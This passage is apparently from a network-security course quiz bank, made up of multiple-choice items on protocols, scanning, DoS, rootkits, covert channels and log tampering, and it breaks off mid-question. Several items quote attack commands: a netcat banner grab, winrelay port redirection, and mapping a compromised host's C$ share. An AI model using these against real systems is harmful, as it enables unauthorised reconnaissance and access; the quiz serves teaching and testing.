b) Nmap
c) ipconfig
d) portscan

7. Which of the following protocols is responsible for addressing hosts in a TCP/IP-based network?
a) TCP
b) UDP
c) DHCP
d) IP

8. What does an attacker do in the Reconnaissance Phase?
i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.
ii. The core of a reconnaissance attack is intrusive information gathering techniques.
iii. The system is breached or accessed in order to retrieve information.

a) i only;
b) i and ii;
c) i, ii and iii;
d) None of the above

9. In order to determine which class any IP address is in, one should examine the first ____ bits of the IP address.

a) 8 bits
b) 3 bits
c) 4 bits
d) 5 bits

10. IP addresses beginning with 127 decimal are reserved for ___________.
a) unknown class
b) reserved for loopback
c) for external testing
d) for future use

11. Which of the following statements is FALSE?
a) A TCP packet includes two port numbers: a source port and a destination port.
b) A TCP port with a listening service is known as a reserved port.
c) The TCP port number is a 16-bit number.
d) There are 65536 different TCP ports on each machine.

12. Which of the following SuperScan’s tool is used to uncover the users account list at the target machine?
a) User account Exploit
b) User Engineering
c) Windows Enumeration
d) Windows User Exploit

13. Which of the following are the basic types of hacker attacks?
i. Denial of Service Attack
ii. Repudiation Attack
iii. Access Attack
iv. Modification Attack

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

14. The transmission control protocol/internet protocol ( TCP/IP ) protocol that handles outgoing mail using port 25 is _____.

a) Simple Mail Transfer Protocol ( SMTP )
b) Post Office Protocol (POP)
c) Internet Mail Access Protocol (IMAP)
d) Secure/Multi Purpose Internet Mail Extensions (S/MIME )

15. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?

a) Tracert
b) ipconfig
c) ping
d) nslookup

16. Ethereal is a software tool used to ____ between client and server machines.
a) test the physical connection
b) test the functionality of Ethernet adaptors
c) observe the packets sent and received
d) transfer data and files

17. Sending an e-mail from one address but making it seem as if it is coming from another is called ______.
a) falsifying
b) telneting
c) exploiting
d) spoofing

18. Each of the following is an OSI Model protocol layer except ______.

a) Software
b) Transport
c) Network
d) Physical

19. The following are methods employed to uncover system vulnerabilities except ______.

a) IP Address Scanning
b) Manual Vulnerability probing
c) Traffic Monitoring
d) Vulnerability Scanning

20. Nmap is able to provide the following types of scanning except ______.

a) TCP Connect
b) TCP SYN
c) Password Scanning
d) UDP Connect

21. The objectives of port scanning are to identify the following except ______.

a) Hardware model number
b) Open ports
c) Host operating system
d) Software or service versions

22. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.

a) 65536 and 65536
b) 32768 and 32768
c) 32768 and 65536
d) 65536 and 32768

23. In the TCP header, there are ____ TCP control bits, also known as the TCP flags.
a) 6
b) 7
c) 8
d) 9

24. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?
a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer 
b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
c) Physical Layer, Data Link Layer, Transport Layer, Network Layer, Session Layer, Presentation Layer and Application Layer
d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

25. Which of the following is FALSE about User Datagram Protocol (UDP)?
a) It is a connection-oriented protocol
b) Packets transmitted are not put in order
c) No retransmission of lost packets
d) No acknowledgement or session tear-down required

26. When a threat uses a vulnerability to attack a resource, severe consequences can result, including:

i. Loss of Confidentiality
ii. Loss of Integrity
iii. Loss of Availability

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) None of the above.

27. Which of the following statements are TRUE about the Computer Misuse Act (Cap 50A)?

i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act
ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence
iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.
iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

28. Which of the following statements is FALSE about Risk Management?
a) Risk can be qualitatively defined in three levels: Low, Medium and High
b) Risk Management is about Security
c) Risk management determines the value of the resources and the level of security for it
d) Threat + Vulnerability = Risk

29. IP resides at which layer of the OSI model?
a) Application
b) Data Link
c) Network
d) Physical

30. TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) Little interaction with Data Link ( Layer 2 )

31. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport
b) Transport -> Data -> Physical -> Network
c) Network -> Transport -> Physical -> Data
d) Transport -> Network -> Data -> Physical

32. Which of the following are TRUE about a Script Kiddie?

i. Has low-level hacking skills
ii. Uses released tools and software to exploit without understanding the underlying vulnerability
iii. Biggest group of attackers and usually rather immature
iv. Uses Social Engineering techniques

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

33. Which of the following is the outcome of an Access Attack?

a) It is an attack against the confidentiality of the information
b) It is an attack against the integrity of information
c) It causes information to be unavailable
d) It is an attack against the accountability of information

34. A person who applies his hacking skills for offensive purposes is known as a
a) Cracker
b) White Hat
c) Ethical Hacker
d) Phreaker

35. Which information directory protocol is the standard for file transfer over the Internet?
a) TCP
b) UDP
c) FTP
d) HTTP

36. What information can be gathered by an attacker by typing the following command using Netcat?
C:> nc www.sp.edu.sg 80 <press Enter>
HEAD / HTTP/1.0 <press Enter>
<press Enter>

a) Domain Name
b) Web Server version
c) Administrative Contact Number
d) Netblock Owner

37. The Internet is “managed” by
a) APNIC
b) ICANN
c) AfriNIC
d) ARIN

38. The most important elements of Google’s technology are:
i. The Google bots
ii. The Google index
iii. The Google cache
iv. The Google API

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

39. General types of reconnaissance data that can be obtained from the Internet are:

i. Employee data
ii. Business partner
iii. Existing technologies
iv. Financial information

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

40. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through

i. Social Engineering;
ii. Physical Break-in;
iii. War Dialling;
iv. Dumpster Diving.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

41. Which of the following measures can be used to defend against Network Mapping?
i. Filter out the underlying messages that network mapping tools rely on by using firewalls and packet-filtering routers;
ii. Block incoming ICMP messages;
iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;
iv. Close all unused ports to prevent an attacker from discovering open ports on your machine

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv

42. The objectives of port scanning are generally to identify one or more of the following:

i. Open ports
ii. Host operating system
iii. Software or service versions
iv. Vulnerable software versions

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

43. Which of the following is FALSE?
a) TCP Connect is also known as Full Open Scan;
b) TCP SYN is also known as Half Open Scan;
c) TCP SYN Port Scanning completes the three-way handshake;
d) TCP SYN Port Scanning is stealthier than TCP Connect scans

44. The exploitation of resources can be performed in many ways. Some of the more common ways are:

i. Technical Vulnerability Exploitation
ii. Denial of Service
iii. Information Gathering
iv. Social Engineering

a) i and ii;
b) i, ii and iii;
c) ii, iii and iv;
d) i, ii, iii and iv;

45. What is the name of the unique physical address that is assigned to every network interface card?

a) IP address
b) Hostname
c) MAC address
d) NetBIOS name

46. Which of the following protocols transmit sensitive information in clear text?

a) FTP and Telnet
b) FTP and TCP
c) Telnet and TCP
d) TCP and ARP

47. The TCP/IP family of protocols includes several components:

i. Transmission Control Protocol (TCP);
ii. User Datagram Protocol (UDP);
iii. Internet Protocol (IP);
iv. Internet Control Message Protocol (ICMP)

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

48. For Information Gathering Methodology under Publicly Available Information, what is the common information an attacker looks for?

i. Names
ii. Emails
iii. Technologies
iv. Current Events / Recent Happenings

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv

49. Which of the following statements is FALSE about ICMP (Internet Control Message Protocol)?
a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks
b) ICMP “mapping” is often conducted via a ping sweep
c) ICMP manipulates the time-to-live (TTL) option in UDP packets (should be TraceRoute)
d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

50. Which of the following information cannot generally be found from the target’s Internet Registrar?
a) Administrative, technical, and billing contact names
b) Customer information
c) Company’s postal addresses
d) Telephone numbers

51. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.
a) Internet Transfer Protocol (ITP)
b) HyperText Transfer Protocol (HTTP)
c) File Transfer Protocol (FTP)
d) Post Office Protocol (POP)

52. Which of the following is the correct sequence of phases of hacker’s attack?
a) Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b) Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c) Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d) Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

53. Which of the following is NOT a defence against Physical Break-in Attack?
a) All computer users must be trained not to give sensitive information away to friendly callers
b) A guard at front door or install a card reader for facility accessing
c) Educate employees about the dangers of letting people in the building without checking their credentials
d) Use automatic password-protected screen savers

54. The premise behind reconnaissance activities is to profile the following except _________.
a) size of the organisation
b) administrative staff
c) network infrastructure
d) an organisation's operations

55. Which of the following statements is FALSE about the key terms used in the risk management process?
a) A Resource is anything in an environment that you are trying to protect
b) A Threat is a resource that can be accessed by making use of a vulnerability in your environment
c) A Vulnerability is a point where a resource is susceptible to attack
d) Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

56. Which of the following is not a well-known TCP port number?
a) 8888
b) 53
c) 80
d) 25

57. Which of the following Hacker Class is also known as “Cracker”?
a) Grey Hats
b) Red Hats
c) Black Hats
d) White Hats

58. Which of the following is NOT a common activity for Scanning?
a) War Dialling
b) Network Mapping
c) Port Scanning
d) Dumpster Diving

59. Internet search engines are used by attackers because they provide the following facilities except ________.
a) Internet directories
b) Link crawlers
c) Caches
d) Hyperlinks



*Overall there are 75 quiz questions (most of those not here are from chapters 5 & 6). Know all the port numbers as well:
PORT 21 FTP
PORT 23 Telnet
PORT 25 SMTP
PORT 53 DNS/Domain
PORT 80 HTTP/Web




255-question quiz for the Final Exam, Topic 1 to Topic 11

1. Which of the following are TRUE about a Smurf Attack?
i. A Smurf attack is also known as a directed broadcast attack
ii. Smurf attacks rely on a directed broadcast to create a flood of traffic for a victim
iii. A perpetrator sends a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source address of a victim

a) i and ii;
b) i and iii;
c) ii and iii;
d) i, ii and iii.

2. The purpose of port scanning is to systematically scan a range of ____.
a) opened ports at the target system.
b) closed ports at the target system.
c) protected ports at the target system.
d) active ports that are running application services at the target system.

3. What is hybrid password cracking?
a) crack password by guessing every possible combination of characters.
b) crack password based on dictionary form.
c) crack password by using a combination of limited dictionary cracks and brute force cracking.
d) crack password based on hybrid characters.

4. A type of software that repairs security flaws in an application is called a(n) ________.
a) hot fix
b) exploit
c) repair
d) patch

5. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?
a) tracert
b) ipconfig
c) ping
d) nslookup

6. Which of the following protocols is responsible for addressing hosts in a TCP/IP-based network?
a) TCP
b) UDP
c) DHCP
d) IP

7. The following are methods employed to uncover system vulnerabilities except ______.
a) IP Address scanning
b) Manual vulnerability probing
c) Traffic monitoring
d) Vulnerability scanning

8. Which of the following statements are TRUE about the Computer Misuse Act (Cap 50A)?
i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act
ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence
iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.
iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

9. Which of the following event files is used to store security-related events like failed logon attempts, policy changes, and attempts to access files without proper permission in a Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

10. Which of the following are the common techniques used by a sophisticated hacker for covering tracks and hiding in a compromised system?
i. Hiding evidence by altering event logs;
ii. Creating difficult-to-find files and directories;
iii. Hiding evidence on the network: Covert Channels;
iv. Deleting log files.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

11. Which of the following is NOT a common activity for Scanning?
a) War Dialling
b) Network Mapping
c) Port Scanning
d) Dumpster Diving

12. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?

a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
c) Physical Layer, Data Link Layer, Transport Layer, Network Layer, Session Layer, Presentation Layer and Application Layer
d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

13. Which application analyses a surfer's shopping habits and interests and inserts pop-up advertisements?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

14. Which method is NOT used in maintaining-access attacks?
a) Trojan Horses
b) Big Worms
c) Backdoors
d) Rootkits

15. A situation in which a program or process attempts to store more data in a temporary data storage area than it was intended to hold is known as a what?
a) Buffer overflow
b) Denial of service
c) Distributed denial of service
d) Storage overrun

16. The following are payloads provided by Metasploit to foist on the target machine except _____.
a) Create new user accounts
b) Bind shell to current port
c) Windows VNC Server DLL Inject
d) Inject DLL into running application

17. Which information directory protocol is the standard for file transfer over the Internet?
a. TCP
b. UDP
c. FTP
d. HTTP

18. Which of the following is NOT a correct defense method against User-Mode Rootkits?

a) Never let attackers get Administrator rights to the system.
b) Install MD5 & SHA-1.
c) Install Tripwire.
d) Install latest operating system patches.

19. If the attack is a SYN flood, which category of Denial-of-Service attack does it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

20. Identify which category of Denial-of-Service attack the Smurf attack belongs to.
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

21. Which of the following is the correct sequence of phases of hacker’s attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

22. Ethereal is a software tool used to ______ between client and server machines.
a) test the physical connection
b) test the functionality of ethernet adaptors
c) observe the packets sent and received
d) transfer data and files

23. TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

24. Which of the following information cannot generally be found from the target’s Internet Registrar?
a) Administrative, technical, and billing contact names
b) Customer information
c) Company’s postal addresses
d) Telephone numbers

25. Which of the following is not one of the IP address ranges reserved for private use by RFC 1918?
a) 10.0.0.0-10.255.255.255
b) 192.168.0.0-192.168.255.255
c) 169.254.0.0-169.254.255.255
d) 172.16.0.0-172.31.255.255

26. An attacker can gain access to very sensitive information about an organisation through the following except _________.
a) Social engineering
b) Physical break-in
c) Dumpster diving
d) software engineering

27. What information can be gathered by an attacker by typing the following command using Netcat?
C:> nc www.sp.edu.sg 80 <press Enter>
HEAD / HTTP/1.0 <press Enter>
<press Enter>

a. Domain Name
b. Web Server version
c. Administrative Contact Number
d. Netblock Owner

28. For a DoS (Denial-of-Service) Attack, Resource Exhaustion can be achieved by:
i. Spawning processes to fill the process table
ii. Filling up the whole file system
iii. Packet floods
iv. Malformed packet attacks

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

29. What type of attack attempts to use every possible key until the correct key is found?
a) Brute-force attack
b) Denial-of-service attack
c) Passive attack
d) Private key cryptography

30. Which of the following protocols should be disabled on a critical network device such as a router?
a) TCP/IP.
b) ICMP.
c) IPX/SPX.
d) RIP

31. Sending an e-mail from one address but making it seem as if it is coming from another is called ______________.
a) falsifying
b) telneting
c) exploiting
d) spoofing

32. The most important elements of Google’s technology are:
i. The Google bots
ii. The Google index
iii. The Google cache
iv. The Google API

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

33. Which of the following is a correct definition of a Trojan?
a) It needs no user intervention to replicate.
b) It sends messages to a computer with an IP address indicating that the message is coming from a trusted host.
c) It collects personal information or changes your computer configuration without appropriately obtaining prior consent.
d) It buries itself in the operating system software and infects other systems only after a user executes the application that it is buried in.

34. Password cracking involves _________________ .
a) stealing the encrypted password representations and trying to recover the original clear text password using an automated tool.
b) mounting a keylogger software in a computer to capture typed password.
c) guessing password using an automated tool.
d) password decrypting using an automated tool.

35. Which of the following is NOT a Distributed Denial-of-Service defense?
a) Packet-filtering firewalls at the DMZ
b) Limit bandwidth
c) Use egress anti-spoofing filters
d) Traffic shaping

36. Which one of the following best describes the type of attack designed to bring a network to a halt by flooding the systems with useless traffic?
a) DoS
b) Ping of death
c) Teardrop
d) Social engineering

37. Which of the following event files is used to store events associated with applications, e.g. databases, Web servers or user applications, in a Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

38. Windows events information is constantly being written into:
i. SECURITY.LOG ;
ii. FILE.LOG;
iii. APPLICATION.LOG;
iv. SYSTEM.LOG.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

39. Most Application-layer protocols only use UDP or TCP at the Transport layer. Which of the following could use both?
a) TCP
b) Microsoft Word
c) Telnet
d) DNS

40. Which of the following is NOT a feature of Windows User-Mode Rootkits?

a) Hiding files, processes, system services, system drivers, Registry keys and TCP/UDP ports.
b) Creating a remotely accessible command-shell backdoor, made invisible on the local system.
c) Activating the hidden system processes.
d) Lying to users about how much free space is available on the hard drive.

41. Which one of the following is not true about a web server?
a) The default port for a web server is port 80.
b) A web server must always run on port 80.
c) A commonly used alternate port for web servers is 8080.
d) The browser client must specify the port if not using well-known port 80.

42. A(n) _______ is a manner of manipulating software to result in undesired behaviour.
a) exploit
b) heap overflow
c) external probing
d) buffer overflow

43. Which of the following are the basic types of hacker attacks?
i. Denial of Service Attack
ii. Repudiation Attack
iii. Access Attack
iv. Modification Attack

a. i, ii and iii;
b. i, ii and iv;
c. i, iii and iv;
d. i, ii, iii and iv.

44. Which of the following event files is used to store events associated with the system's functioning, e.g. failure of a driver or inability of a service to start, in a Windows system?

a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

45. Which of the following protocols does Ethereal indicate when pinging a computer?
a) Internet Control Message Protocol (ICMP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Domain Name System (DNS)

46. The exploitation of resources can be performed in many ways. Some of the more common ways are:
i. Technical Vulnerability Exploitation
ii. Denial of Service
iii. Information Gathering
iv. Social Engineering

a. i and ii;
b. i, ii and iii;
c. ii, iii and iv;
d. i, ii, iii and iv.

47. Which of the following is the type of algorithm used by MD5?
a) Block cipher algorithm
b) Hashing algorithm
c) Asymmetric encryption algorithm
d) Cryptographic algorithm

48. Which are the other three of the SIX common techniques that can be applied to mount an effective defence against attackers having the ability to alter logs?
- Activate Logging
- Setting Proper Permissions
- Using a Separate Logging Server

i. Encrypting Log Files
ii. Making Log Files Append Only
iii. Protecting Log Files Using Write-once Media
iv. Renaming Log Files

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) ii, iii and iv.

49. What is the meaning of Anonymizing HTTP Proxy?
a) Allow the attacker to surf the web as an anonymous user.
b) Allow the attacker to surf the Web without revealing the attacker's location.
c) Allow the attacker to surf the web without revealing the attacker's user account.
d) Allow the attacker to surf the web without revealing the attacker's HTTP sequence number

50. Which of the following is FALSE?
a) TCP Connect is also known as Full Open Scan;
b) TCP SYN is also known as Half Open Scan;
c) TCP SYN Port Scanning completes the three-way handshake;
d) TCP SYN Port Scanning is stealthier than TCP Connect scans.

51. IP addresses beginning with 127 decimal are reserved for ___________.
a) unknown class
b) reserved for loopback
c) for external testing
d) for future use

52. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.
a) Internet Transfer Protocol (ITP)
b) HyperText Transfer Protocol (HTTP)
c) File Transfer Protocol (FTP)
d) Post Office Protocol (POP)

53. Consider the situation in which an intervening entity such as a firewall blocks direct access to a target system. Resourceful attackers can find their way around these obstacles using ________.
a) denial-of-Service
b) port redirection
c) telnet
d) ftp

54. Which of the following is NOT a correct method to defend against bots, backdoors & spyware?
a) Use Antivirus and Antispyware Tools
b) Looking for Unusual TCP and UDP ports
c) Knowing Your hardware
d) Knowing Your Software

55. Which of the following is a class C address?
a) 128.10.54.120
b) 92.200.138.24
c) 168.28.10.165
d) 193.10.160.45

56. The most popular techniques for launching packet floods are:
i. Bonk;
ii. SYN floods
iii. Smurf attacks
iv. Distributed DoS attacks

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

57. What does it mean when running the following command at PC 192.168.1.2?
winrelay –lip 192.168.1.2 –lp 4000 –dip 192.168.1.23 –dp 5000 –proto tcp
i. It is a Trojan horse;
ii. PC 192.168.1.2 has been set up to listen on port 4000;
iii. Traffic that arrives at port 5000 will be redirected to port 4000;
iv. PC 192.168.1.23 is the destination where the traffic will go to.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

58. Which of the following SuperScan4 tools is used to uncover the user account list?
a) Host and Service Discovery
b) Users Discovery
c) Scan Options
d) Windows Enumeration

59. Starting with Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1, Microsoft's OS provides a feature called _____________ to support non-executable stack or heap capabilities.
a) Stack Overflow Prevention
b) Data Execution Prevention
c) Buffer Overflow Prevention
d) Memory Execution Prevention

60. For Information Gathering Methodology under Publicly Available Information, what is the common information an attacker looks for?
i. Names
ii. Emails
iii. Technologies
iv. Current events / Recent happenings

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

61. Which application-level Trojan backdoor is able to grab keystrokes from the user and send sensitive information back to the attacker?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

62. Which of the following is FALSE?
a. There are five Regional Internet Registries (RIR) under Address Supporting Organization
b. Domain name registrations are handled by Internet Corporation for Assigned Names and Numbers (ICANN)
c. Each RIR maintains a whois database holding details of IP address registrations in its region
d. ICANN is responsible for coordinating the management of the technical elements of the DNS to ensure universal resolvability so that all users of the Internet can find all valid addresses

63. Which of the following is a known Kernel-Mode Rootkits software tool?
a) FU Rootkit for Windows.
b) KM Rootkit for Windows.
c) SU Rootkit for Windows.
d) KU Rootkit for Windows.

64. Which of the following statements is FALSE about Covert_TCP?
a) The Covert_TCP’s covert channels are constructed by inserting data into unused or misused fields of TCP/IP headers
b) The Covert_TCP’s covert channels are constructed by embedding one protocol entirely in a different protocol
c) Covert_TCP allows for transmitting information by entering ASCII data in TCP/IP header fields
d) TCP/IP header fields used are: IP Identification, TCP sequence number and TCP acknowledgement number

65. Which of the following is NOT a defence against Physical Break-in Attack?
a) All computer users must be trained not to give sensitive information away to friendly callers
b) A guard at front door or install a card reader for facility accessing
c) Educate employees about the dangers of letting people in the building without checking their credentials
d) Use automatic password-protected screen savers

66. Which of the following is commonly found to be a nonessential service on a web server?
a) Server service
b) DNS service
c) FTP service
d) Print spooler service

67. A _____ is an error condition in a software program that allows malicious code to be injected and put into operation without user intervention.
a) syntax overflow
b) semantic overflow
c) buffer overflow
d) software overflow

68. An attacker gathers the following types of reconnaissance data from a company's own web site except _________.
a) hardware models
b) business partner
c) existing technologies
d) recent mergers and acquisitions

69. Which of the following is the best way to protect against security vulnerabilities within OS software?
a) Install the latest service pack.
b) Reinstall the OS on a regular basis.
c) Back up the system regularly.
d) Shut down the system when it is not in use.

70. Which of the following is the best method for preventing social engineering attacks?
a) User education
b) Security tokens
c) Biometric devices
d) Encryption

71. Which of the following protocols transmit sensitive information in clear text?
a) FTP and Telnet
b) FTP and TCP
c) Telnet and TCP
d) TCP and ARP

72. Which of the following statements is FALSE?
a) TCP Packet includes two port numbers: a source port and a destination port
b) A TCP port with a listening service is known as a reserved port
c) The TCP port number is a 16-bit number
d) There are 65,536 different TCP ports on each machine

73. Which of the following statements is FALSE?
a) The .EVT files are “locked” on a running Windows machine, and cannot be opened or edited with a standard file-editing tool
b) On Linux and Unix systems, the vast majority of log files are written in plain ASCII text
c) The main accounting files in Linux and Unix are utmp, wtmp and lastlog files
d) The .EVT files on Windows machine can be opened or edited with a standard file-editing tool

74. Each of the following is an OSI model protocol layer except ______________.
a) Software
b) Transport
c) Network
d) Physical

75. When a browser is trying to contact a Web server, the client OS dynamically assigns a source port value of ______.
a) less than 1024.
b) greater than 80.
c) greater than 1023.
d) greater than 1024.

76. The primary goal of information security is to protect ______________.
a) procedures
b) people
c) information
d) products

77. Which of the following event files is the most often targeted because it contains the majority of the events that attackers want to remove?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

78. For DoS (Denial-of-Service) Attack, Stopping service means:
a) crashing or shutting off a specific program or machine that users want to access;
b) stopping the computer from booting up;
c) shutting down the computer remotely;
d) stopping the network resource from being accessed.

79. Which is NOT a countermeasure of Buffer Overflow Attacks?
a) avoid sloppy programming
b) configure system with executable stack
c) implement strict control on unnecessary outgoing traffic from the network
d) apply patches to system

80. To protect the privacy of web surfing habits, which of the following should be deleted on a regular basis?
a) Download history
b) SSL certificates
c) Cookies
d) Plug-ins

81. In order to exploit the RPC vulnerability, the attacker would require the ability to send a specially crafted request to which three ports of the remote machine?
a) 135, 139 or 145
b) 21, 23 or 80
c) 21, 135 or 139
d) 135, 139 or 445

82. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport
b) Transport -> Data -> Physical -> Network
c) Network -> Transport -> Physical -> Data
d) Transport -> Network -> Data -> Physical

83. Which of the following statements is FALSE?
a) Covert channels often rely on technique called tunnelling, which allows one protocol to be carried over another protocol
b) Techniques for establishing covert channels across the network require both a client (attacker system) and a server (victim system)
c) Loki and Reverse WWW Shell are widely exchanged within the computer underground based on tunnelling covert information techniques
d) Reverse WWW Shell utilises ICMP as a tunnel to carry on interactive communications with the backdoor listener

84. Which of the following is the correct sequence of phases of a hacker attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

85. You need to allow only secure Internet traffic in and out of your company network. Which of the following ports would you open on the firewall?
a) 22
b) 53
c) 80
d) 443

86. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through i. Social Engineering; ii. Physical Break-in; iii. War Dialling; iv. Dumpster Diving.
a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

87. The attacker had managed to access the target system. Identify the command execution statement of
>net use z: \\192.168.1.2\c$ */u:student
a) check which network is connected to the Z drive of the target system.
b) check whether there is a network "student" which is connected to the z drive of the target system.
c) map the c drive of the target system to the z drive of the attacker.
d) map the attacker system's c drive to the z drive of the target system.

88. The objectives of port scanning are generally to identify one or more of the following: i. Open ports ii. Host operating system iii. Software or service versions iv. Vulnerable software versions
a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

89. Which of the following is the outcome of an Access Attack?
a. It is an attack against the confidentiality of the information
b. It is an attack against the integrity of information
c. It causes information to be unavailable
d. It is an attack against the accountability of information

90. TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

91. When a threat uses a vulnerability to attack a resource, the severe consequences can include:
i. Loss of Confidentiality
ii. Loss of Integrity
iii. Loss of Availability

a. i and ii;
b. ii and iii;
c. i, ii and iii;
d. None of the above.

92. Which layer of the OSI model is responsible for code and character-set conversion as well as recognizing data formats?
a) Application
b) Presentation
c) Session
d) Network

93. Nmap is able to provide the following types of scanning except ______.
a) TCP Connect
b) TCP SYN
c) Password Scanning
d) UDP Connect

94. Which of the following Hacker Class is also known as “Cracker”?
a. Grey Hats
b. Red Hats
c. Black Hats
d. White Hats

95. Identify one method to defend against a DDoS attack that locally stops services.
a) Apply the principle of providing least privilege rights to user.
b) Implement per user limits on the consumption of file system space, memory and CPU usage.
c) Deploy some system monitoring software that can detect when system resources are running low.
d) Keep your system regularly patched and apply relevant security bug fixes.

96. You suspect one of your servers may have succumbed to a SYN flood attack. Which one of the following tools might you consider using to help confirm your suspicions?
a) Netstat
b) Ping
c) Tracert
d) Ipconfig

97. Which of the following is NOT the correct countermeasure against SYN flooding?
a) increase the size of connection queue
b) have redundant communication links to sensitive systems that must be connected to the Internet all the time.
c) use SYN cookies
d) Do not dole out user privileges carelessly

98. Which of the following is a probable cause of a hacker creating a back door in a system?
a) The hacker is trying to guess the credentials of the user.
b) The hacker is trying to get access without having to authenticate.
